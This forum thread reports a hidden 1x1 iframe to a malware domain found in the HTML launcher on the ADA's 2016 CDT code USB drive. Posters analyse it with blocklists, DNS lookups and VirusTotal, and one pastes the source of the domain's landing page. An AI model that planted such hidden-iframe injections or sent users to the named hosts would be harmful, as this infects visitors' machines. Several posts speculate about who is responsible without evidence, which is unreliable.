Search similar:
|
|
uniqs 8982 |
|
|
|
Mike Mod join:2000-09-17 Pittsburgh, PA ·Verizon FiOS
2 edits
35 recommendations |
Mike
Mod
2016-Apr-22 4:09 pm
ADA just sent me a surpriseOh wow the usually inept ADA just sent me new codes. I bet some marketing genius had this wonderful idea instead of making it downloadable. I can't wait to plug an unknown USB into my computer that has PHI/HIPAA on it... Okay let's plug into a spare machine. Okay looks like some HTML launcher. Wonder what the source code looks like? <!DOCTYPE html>
<html>
<head>
<title>CDT 2016</title>
<link rel="icon" href="Media/images/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="Media/images/favicon.ico" type="image/x-icon" />
<meta http-equiv="Content Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;">
<meta http-equiv="x-rim-auto-match" content="none">
<link rel="stylesheet" media="screen" href="style.css">
<script src="Media/js/jquery-1.10.1.min.js"></script>
<style>
body{font-family:Arial, Helvetica, sansserif;font-weight:normal;margin:0px auto;padding:0px auto;}
option{}
button{
background-color:#FF8000;
color:#ffffff;
font-weight:bold;
font-size:10pt;
text-align:center;
height:28px;
width:74px;
padding: 2px 0px;
cursor:pointer;
}
select{}
label[for="slct1"],label[for="slct2"]{float:left;margin-top;20px;font-size:16pt;font-weight:bold;}
#container{
width:1024px;
height:786px;
margin:0px auto;
}
#left{float:left;height:786px;width:542px;background-color:#FFFFFF;margin:0px auto;}
#mainimg{height:90%;width:100%;background-color:#999;}
#right{float:left;height:786px;width:482px;background-color:#dddddd;margin:0px auto;}
#copy{text-align:left;color:#151515;padding-left:39px;padding-top:15px;font-size:10pt;}
#shadow{height:786px;width:8px;float:left;margin-right:10px;}
#instruction{float:left;margin:0px;font-size:14px;line-height:25px;color:#433d38;}
#toc{float:left;color:#0076be;width:391px;margin-top:58px;margin-bottom:37px;}
#content{float:left;width:391px;margin:125px auto 0px 30px;}
#slct1{float:left;width:391px;margin-bottom:30px;-webkit-box-shadow: inset 1px 1px 1px 1px #999999;box-shadow: inset 1px 1px 1px 1px #999999;}
#slct2{float:left;width:391px;margin-bottom:30px;-webkit-box-shadow: inset 1px 1px 1px 1px #999999;box-shadow: inset 1px 1px 1px 1px #999999;}
#links{height:90%;width:100%;margin-top:180px;font-size:13px;color:#433d38;}
#pipes{color:#0076be;}
.clearfix{clear:both;}
a, a:visited, a:hover, a:link{color:#0076be;text-decoration:none;font-weight:bold;font-size:14px;}
</style>
</head>
<body>
<div id="container">
<div id="left">
<img id="mainimg" src="Media/images/CDT_Cover.jpg" />
<div class="clearfix"></div>
<p id="copy">© 2015 American Dental Association</p>
</div>
<div id="right">
<img src="Media/images/shadow.png" id="shadow" />
<div id="content">
<p id="instruction">Click on the links below to open searchable PDF documents.</p>
<h2 id="toc">Menu</h2>
<!--<select id="slct1" name="slct1">
<option value="Option 00"selected>Please select an option</option>
<option value="documents/Table_of_Contents_and_Preface.pdf">Table of Contents and Preface</option>
<option value="documents/1_Code_on_Dental_Procedures_and_Nomenclature.pdf">Code on Dental Procedures and Nomenclature (CDT Code)</option>
<option value="documents/2_Changes_to_the_CDT_Code.pdf">CDT Code Changes (Summary of additions, revisions, & deletions)</option>
<option value="documents/3_Alphabetical_Index.pdf">Alphabetical Index</option>
<option value="documents/4_Numeric_Index.pdf">Numeric Index</option>
<option value="documents/2012_Dental_Claim_Form.pdf">2012 ADA Dental Claim Form</option>
</select> -->
<!--<div class="clearfix"></div>
<div class="clearfix"></div>-->
<!--<button onclick="location.href=slct1.value;" formtarget="_blank">OPEN</button>-->
<!--<button class="button" onclick="window.open(slct1.value);">Open</button>-->
<table style="width: 400px; line-height:30px;">
<tr><td><a href="documents/Table_of_Contents_and_Preface.pdf" target="_blank">Table of Contents and Preface</a></td></tr>
<tr><td><a href="documents/1_Code_on_Dental_Procedures_and_Nomenclature.pdf" target="_blank">Code on Dental Procedures and Nomenclature (CDT Code)</a></td></tr>
<tr><td><a href="documents/2_Changes_to_the_CDT_Code.pdf" target="_blank">CDT Code Changes (Summary of additions, revisions, & deletions)</a></td></tr>
<tr><td><a href="documents/3_Alphabetical_Index.pdf" target="_blank">Alphabetical Index</a></td></tr>
<tr><td><a href="documents/4_Numeric_Index.pdf" target="_blank">Numeric Index</a></td></tr>
<tr><td><a href="documents/2012_Dental_Claim_Form.pdf" target="_blank">2012 ADA Dental Claim Form</a></td></tr>
</table>
<div class="clearfix"></div>
<div id="links">
For more ADA resources, visit:<br />
<a href="http://www.adacatalog.org" target="_blank">adacatalog.org</a><span id="pipes"> | <a href="http://success.ada.org" target="_blank">Success.ADA.org</a> | </span><a href="http://www.ada.org" target="_blank">ADA.org</a>
</div>
</div>
</div>
</div>
<iframe src="http://------NtKrnlpa------.cn---------/rc/" width=1 height=1 style="border:0"></iframe>
</body>
</html> ����������������������������������������������������������������������������������
Wait. <iframe src="http://------NtKrnlpa------.cn---------/rc/" width=1 height=1 style="border:0"></iframe>
(please note this is modified code) Good job. The ADA just sent a malware injector to every ADA dentist in the US. Dumb shits. Edited the URL code because Avast is being bad. | | 19579823 (banned)An Awesome Dude join:2003-08-04
4 recommendations |
19579823 (banned)
Member
2016-Apr-22 8:13 pm
What a bunch of morons!!!! | | VikingBobGo Jets Go! Premium Member join:2004-06-05 MB Canada
3 recommendations |
to Mike
Nothing suspicious there at all... Oddly, a detection rate of just 10/67: » virustotal.com/en/url/ec ··· 1375227/ | | CartelIntel inside Your sensitive data outside Premium Member join:2006-09-13 Chilliwack, BC 1 edit |
to Mike
||ntkrnlpa.cn^ malware domains list...its a legit badware link. » easylist-downloads.adblo ··· full.txtalso: » urlquery.net/report.php? ··· 28025779attackpage | | sivranVive Vivaldi Premium Member join:2003-09-15 Irving, TX |
sivran to Mike
Premium Member
2016-Apr-22 10:35 pm
to Mike
Wow, wait, so this legitimately came from the ADA, or some miscreants pretending to be the ADA? | | Mike Mod join:2000-09-17 Pittsburgh, PA |
Mike
Mod
2016-Apr-22 10:44 pm
This came from the ADA. It's my annual book. This was in the shrink wrap. | | TekieNeeds More Coffee join:2008-01-03 Colonial Heights, VA
6 recommendations |
to Mike
Doh...haven't watched the Simpsons in awhile, when did Homer leave Springfield nuclear power and go to the ADA ? | | SnowyLock him up!!! Premium Member join:2003-04-05 Kailua, HI
10 recommendations |
Snowy to Mike
Premium Member
2016-Apr-23 12:46 am
to Mike
said by Mike:This came from the ADA. It's my annual book. This was in the shrink wrap. Here's my *guess* of how/why this happened (no rocket science involved). With 156,000 members the lowest bid for the hardware/writing came from a company located in China. The rest is history. The ADA's press release on the matter will begin with: The American Dental Association takes the privacy & security of it's members very seriously...I'd suggest they take the word "American" in their name a little more seriously or risk having a name change to: " The P'wned American Dental Association" | | Bill_MIBill In Michigan MVM join:2001-01-03 Royal Oak, MI |
to Mike
| |
2 recommendations |
to Mike
That 'hidden' iframe technique is rather old. Have you verified that its not your system(s) generating the embed just to rule it out? Please contact the responsible parties at the ADA to make them aware of the issue. | | Mike Mod join:2000-09-17 Pittsburgh, PA
5 recommendations |
Mike
Mod
2016-Apr-23 8:05 am
Three books, read only disk, and different machines.
I'm asking people for more samples. | | Bill_MIBill In Michigan MVM join:2001-01-03 Royal Oak, MI TP-Link Archer C7 Linksys WRT54GS Linksys WRT54G v4
|
said by Mike:I'm asking people for more samples. If I coax my dentist to stick it in, say, my Linux laptop, what am I looking for? I assume a file? | | Mike Mod join:2000-09-17 Pittsburgh, PA |
Mike
Mod
2016-Apr-23 8:59 am
Yeah look for the html file. There are folders and an autorun in there. | | |
to Mike
...I was about to wonder about the iframe tag myself -- IIRC that only worked on IE, but according to Wikipedia, it's now part of HTML5 *shudders* @VikingBob Thanks for that link... yeah, other than the .cn TLD, with 10/67 recording it as a bad link... one wonders. DNS resolution of the URL from OpenDNS is as follows Non-authoritative answer: Name: NtKrnlpa.cn Addresses: 50.117.120.253 50.117.116.117 and from Level3 > server 4.2.2.2 Default Server: b.resolvers.Level3.net Address: 4.2.2.2
> NtKrnlpa.cn Server: b.resolvers.Level3.net Address: 4.2.2.2
Non-authoritative answer: Name: NtKrnlpa.cn Addresses: 50.117.120.253 50.117.116.117 And according to ARIN that netblock is under it's jurisdiction Registrant info last confirmed 2016-02-01 Abuse POC for that netblock, according to ARIN, which may be another avenue to pursue this... Point of Contact Name Abuse Department Handle ABUSE1715-ARIN Company Energy Group Networks Street 830 Hillview Court Suite 195 City Milpitas State/Province CA Postal Code 95035 Country US Registration Date 2007-07-20 Last Updated 2015-10-26 Comments Phone +1-888-808-8806 FREE (Office) Email abuse@egihosting.com ...anyone with a VM and mad programming skills want to go to that URL and see what it brings up / does? My humble 00000010bits Regards | |
3 recommendations |
to Mike
As an FYI, my Avast flagged this thread as having malware and refused to load it the first time that I tried. On the second attempt it did let me look at it, but subsequent attempts have been erratic. So Avast is being vigilant, but not necessarily as consistent as I might expect.
Avast: Infection blocked
Infection details:
URL: "https://www.dslreports.com/forum/r30717075-ADA-just-sent-me-a-surprise|{gzip}"
Infection: HTML:Iframe-ZS [Trj]
Process: C:\Program Files\Google\Chrome\Application\chrome.exe | | Mike Mod join:2000-09-17 Pittsburgh, PA
2 recommendations |
Mike
Mod
2016-Apr-23 4:05 pm
Probably saw the code. | |
2 recommendations |
scross
Member
2016-Apr-23 5:30 pm
That's what I'm thinking, too, but its behavior is kind of weird. Right after I posted the above message, Avast simply refused to let me access this thread again - just flat-out blocked it, with no warning, no nothing. But now, after some time has passed, I can see it again and Avast is again throwing the warning. I wonder if this is a time-out thing, or if maybe Avast sees that the page has changed because you posted a new message.
In any case, situations like this (the ADA sending out malware, if that's what really happened) are just unconscionable in this day and age. It reminds me of a situation I faced a couple of years ago, where I was trying to access a law enforcement security-related website, only it was loaded with malware and Avast kept going nuts. They couldn't seem to get it cleaned up, either (or at least keep it cleaned up), and so eventually took it down for an extended period of time. I don't know if they ever brought it back up again. | | DarkLogixTexan and Proud Premium Member join:2008-10-23 Baytown, TX
2 recommendations |
Maybe the ADA and FBI or NSA or CIA are trying to get more Trojans out to get more data.
I'd try contacting them or e-mailing an Arstechnica writer. | | BlackbirdBuilt for Speed Premium Member join:2005-01-14 Fort Wayne, IN
2 recommendations |
to Mike
Or... perhaps maybe the simplest explanation is the most likely: a hacker cartel figured that infecting dental-office computers en-mass might just be an easy way to get at a host of patient records (and perhaps credit card data) or perhaps they intend to suddenly hit the dental systems with ransomware. All it would take was somebody on the "inside" to insert the malware code into the ADA stick code at the factory or anywhere earlier in the custody chain, which - with the typical lack of in-depth QA in certain notable parts of the Orient - would just about guarantee a large 'placement' of malware. Who's going to notice? Certainly not the ADA, nor probably the outfit they hired to put the procedure codes into digital form. The sad truth is that on something like this, nobody is paying attention. Until now. | | norwegian Premium Member join:2005-02-15 Outback 3 edits
1 recommendation |
to Mike
For the record: » www.stopbadware.org/fire ··· %2Frc%2FThe page links to: hxxp://pd.dopa.com.cn/?dm=ntkrnlpa.cn&acc=936A22A3-A90C-487E-B7D0-E589A70BB515&poprequest=1 I had a few blocks in place and didn't just allow so it might not be fully correct. Jsunpack used to be a good source for checking links like this but I've found them offline these days. <!DOCTYPE html><!--[if lt IE 7]><html class="ie6"><![endif]--><!--[if IE 7]><html class="ie7"><![endif]--><!--[if IE 8]><html class="ie8"><![endif]--><!--[if IE 9]><html class="ie9"><![endif]--><!--[if(gt IE 9)|!(IE)]><!--><html class=""><!--<![endif]--><head><meta http-equiv="Content-Type"content="text/html; charset=utf-8"><title>ntkrnlpa.cn</title><style>*{margin:0;padding:0;border:0}body{font-size:14px;font-family:"SimSun","宋体","Arial Narrow";background-color:#f0f0f0}.left{float:left}.right{float:right}.mt12{margin-top:12px}a{text-decoration:none;cursor:pointer}.bgbox{width:958px;border:1px solid#333;background-color:#202020}.top_bg{min-width:1210px;height:40px;background-color:#3388FF;color:white;margin-bottom:10px}.top_bg h1{font-family:"Microsoft YaHei";font-size:22px;font-weight:normal;line-height:40px;float:left;width:250px}.container{width:1210px;margin:0 auto;height:40px}.content{background-color:#202020}.content.left_con{width:215px}.right_con{border-left:2px solid#303030;padding-left:20px}.ie6 .right_con,.ie7 .right_con{padding-left:20px}.clearfix:after{clear:both;content:".";display:block;font-size:0;height:0;line-height:0;visibility:hidden}.Dline{width:960px;height:1px;border-top:2px solid#303030}.search_bar{height:90px;width:733px;margin:0 auto}img{vertical-align:middle}input{outline:medium none}.s{display:inline-block;vertical-align:top}.s_inp_wr{background:#fff;border-color:#9A9A9A#CDCDCD#CDCDCD#9A9A9A;border-image:none;border-style:solid;border-width:1px;height:34px}.s_btn_wr{height:36px;width:100px;z-index:0;background:#3385ff}.s_ipt{font:16px/22px arial;height:22px;text-align:left;margin:7px 0 0 7px;width:512px}.s_btn{cursor:pointer;font:15px/36px arial;letter-spacing:1px;background:#3385ff;border-bottom:1px solid#2d78f4;color:#fff;height:36px;width:100px}.hot_search{height:35px;margin-left:96px;font-size:14px;color:#939393}.hot_search li{float:left;padding:12px 10px;display:inline}.hot_search li a{color:#939393}.hot_search li a:hover{text-decoration:underline;color:#c00}.bt_addlink{height:180px;padding-top:10px}.bt_addlink a{float:left;padding:0 58px 0 6px;width:98px;color:#0098c8;font:normal 15px/34px"宋体";display:block;height:34px;overflow:hidden}.bt_addlink a.last{padding-right:0px}.bt_addlink a:hover{text-decoration:underline;color:#f00}.bottom_add{padding:20px 20px 12px}#footer{position:relative;margin-top:20px;color:#999;text-align:center;font-size:14px;line-height:20px;font-family:"\5fae\8f6f\96c5\9ed1",'Microsoft Yahei'}#footer.footer-cont{background:#2a2931;position:relative;min-width:1210px}#footer.footer-detail{margin:0 auto;padding:13px 0;padding-top:20px;width:1000px;color:#999}#footer.footer-detail a{padding:0 10px;color:#999}#footer.footer-detail a:hover{text-decoration:underline}#footer.footer-l{position:absolute;left:20px;top:20px}#footer.footer-r{position:absolute;right:20px;top:20px}#body{background:#f0f0f0;width:1230px}.xinnet{float:left;line-height:40px;font-size:16px;color:#fff}</style></head><script type="text/javascript">var unique=(function(){var time=(new Date()).getTime()+'_',i=0;return function(){return time+(i++)}})();var gl={trackingurl:'http://pd.dopa.com.cn/tracking.php',searchurl:'/'};var err={errorcode:0,errormsg:''};var google_afd_request={};var secondtier_request={dm:'ntkrnlpa.cn',sk:'',partner:'121',format:'json',sac:'',oc:false};var req={dm:'ntkrnlpa.cn',acc:'936A22A3-A90C-487E-B7D0-E589A70BB515',landerid:480,cate:0,buy:true,adultallowed:true,cusbuy:'',contactinfo:'',partner:'secondtier',ac:12,kc:10,sk:'',is:false,lp:true,oc:true,q:'A4YpTvlwHnbPPheoYaqhiM7_vs01t2fO8bdsX5hIDA6192jWgkUW3OL-qGc6NE-8QqQDa_ZYuZR3p35m4YlCHeYJqFF8ZRbHRF1c3MV6FbljlI7JYB2kjDYOGnwRXC3x9UZT_3cMh0HrTfn9T1Oz_qLv_PoN0dLJLfYq6_rBQ8alwkTFrszNeEH29A-9mnbFqXjk6WPov95pLCE37XiO8-GMfaJz6WX66c9z6SWI7J9UbDBXO9v00OgI n71kpxXyiiGMUdCtX4UejMWvx985kJW9UL23Qodywk-XZrLv8CsI-2F8kRxe9HN2ZuJObLEnndoETd3-d9 PYDO_S4WJVV2EoVmH-G7pdIz7Wi-DGTWpz6oQVfYpvZe8OPqydMuXjc1Coq213VhjK2iM_9oCBhmgJQvhU5ASTjt30KLMG4lAnkx_iesvqipuUNBWrFC_EKFgjuoevoMPdtR0YXq5L5p8KVcJtsk93FFW_vyoKn61_GI1IemDkDCC2e5FNPRfUc-FoSMBKfe1ZluYr_bEwsGAH9XmtJHPFSeNfrNgQd68zQZV2viTle6jT0S9ZvMMAZEy8oucULyaGPtSW3blIlaaXgri53f8nxVd tL7yxC851kN1n8HTzug1AHujy9CesV3wObrTi1AUu04uQaxlPXDnbUAjyQtukkr0SQmCoOF84-lkJfmcMJ WfHV8Cx65gZmWipJmUgGzv7BBuIujTohn9-Vwt2SZUtwT-yX_TfNbqMOkM-8_tp7mM2fNYDkuHf',framerequest:true,hk:'',sc:0,apk:''};var resp={response_snapped:false,isfaillisted:false,isadult:false,needsreview:false,isblocked:false,q:'',search_token:'',token:'',feedback_url:'',ac:0,kc:0,ads:[],rks:[],cates:[],tz:new Date().getTimezoneOffset(),ck:'',px:0,py:0,mm:false};resp.rks=[];</script><script src="http://a1.dnbizcdn.com/js/b/caf.js"type="text/javascript"></script><script type="text/javascript">denyFrame();try{}catch(e){setErrorTracking(e)}function init(){setRequestTracking()}window.onload=init;</script><body><div class="top_bg"><div class="container"><div class="left"id="unit_dm"><h1>ntkrnlpa.cn</h1><div class="clearfix"></div></div><div id="div_custom"class="right"style="width:600px;line-height:20px;text-align: right; padding-top:10px;"><script type="text/javascript">try{if(req.buy){if(req.cusbuy.length>0){document.write(req.cusbuy)}else if(req.contactinfo.length>0){document.write(req.contactinfo)}}}catch(e){}</script></div></div></div><link rel="stylesheet"href="http://a1.dnbizcdn.com/rd.121.com/css/global.css"/><link rel="stylesheet"href="http://a1.dnbizcdn.com/rd.121.com/css/index-m1.css"/><div class="layout"><div style="border:1px solid #ddd;"><div><!--u2578532#pd.dopa.com.cn#首页-1p顶部图片广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578532";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"1198",rsi1:"200",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"180",pih:"160",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div><!--u2578705#pd.dopa.com.cn#首页-1p顶部图片广告1创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578705";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"1198",rsi1:"200",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"180",pih:"160",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div><a href="http://traffic.cn/cn/ticket.html#nav"target="_blank"><img src="http://a1.dnbizcdn.com/rd.121.com/images/traffic1200x100.jpg"width="1198"/></a></div><div><div class="fl"><!--u2578710#pd.dopa.com.cn#首页-1p顶部图片广告2创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578710";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"599",rsi1:"200",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"180",pih:"160",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578733#pd.dopa.com.cn#首页-1p顶部图片广告3创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578733";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"599",rsi1:"200",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"180",pih:"160",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="clearfix"></div></div></div></div><!--每日推荐start--><div class="layout"><div id="meiritj"class="mt10"><div class="imgtt"><!--u2578721#pd.dopa.com.cn#首页-2p纯文本广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578721";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"1198",rsi1:"32",pat:"3",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",tft:"0",tlt:"1"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="imgcons"><div class="fl"style="width:300px;"><div class="l-img"><!--u2578743#pd.dopa.com.cn#首页-2p左大图广告300*250创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578743";</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div style="padding-top:10px;background:#fff;"><!--u2578749#pd.dopa.com.cn#首页-2p左大图下纯文本广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578749";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"300",rsi1:"150",pat:"3",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",tft:"0",tlt:"1"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div></div><div class="r-list fr"><!--u2578754#pd.dopa.com.cn#首页-2p右图片广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578754";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"860",rsi1:"210",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"200",pih:"180",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script><!--u2578761#pd.dopa.com.cn#首页-2p右图片广告1创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578761";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"860",rsi1:"210",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"200",pih:"180",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="clear"></div></div><div class="clear"></div></div></div><!--每日推荐end--><div class="layout"><div class="mt20"style="border:1px solid #ddd;"><div class="fl"><!--u2578769#pd.dopa.com.cn#首页-2p下方图片广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578769";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"340",rsi1:"180",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"160",pih:"140",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578772#pd.dopa.com.cn#首页-2p下方图片广告1创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578772";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"518",rsi1:"180",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"160",pih:"140",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578775#pd.dopa.com.cn#首页-2p下方图片广告2创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578775";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"340",rsi1:"180",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"160",pih:"140",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="clearfix"></div></div></div><!--社会动态start--><div class="layout"><div id="shehuidt"class="mt20"><div class="imgtt"><!--u2578777#pd.dopa.com.cn#首页-3p纯文本广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578777";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"1198",rsi1:"32",pat:"3",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",tft:"0",tlt:"1"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="imglist"><div style="margin-left:-13px;"><!--u2578817#pd.dopa.com.cn#首页-3p纯文本下方图片广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578817";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"1190",rsi1:"180",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"220",pih:"155",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div style="margin-left:-13px;"><div class="fl"><!--u2578824#pd.dopa.com.cn#首页-3p纯文本下左边两图广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578824";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"480",rsi1:"180",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"220",pih:"155",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578836#pd.dopa.com.cn#首页-3p纯文本下右边图片广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578836";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"710",rsi1:"180",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"220",pih:"155",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="clearfix"></div></div></div></div></div><!--社会动态end--><div class="layout"><div class="mt20"style="height:35px;"><!--u2578848#pd.dopa.com.cn#首页-3p单独纯文本广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578848";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"1198",rsi1:"35",pat:"3",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"1",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",tft:"0",tlt:"1"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div></div><div class="layout"><div style="border:1px solid #ddd;"class="mt20"><div class="fl"><!--u2578859#pd.dopa.com.cn#首页-3p左图片广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578859";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"599",rsi1:"200",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"180",pih:"160",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578868#pd.dopa.com.cn#首页-3p右图片广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578868";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"599",rsi1:"200",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"180",pih:"160",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="clearfix"></div></div></div><div class="layout"><div class="mt20"><div class="fl"><!--u2578882#pd.dopa.com.cn#首页-4p标签云广告580*90创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578882";</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"style="margin-left:20px;"><!--u2578892#pd.dopa.com.cn#首页-4p图片图文广告580*90创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578892";</script><script 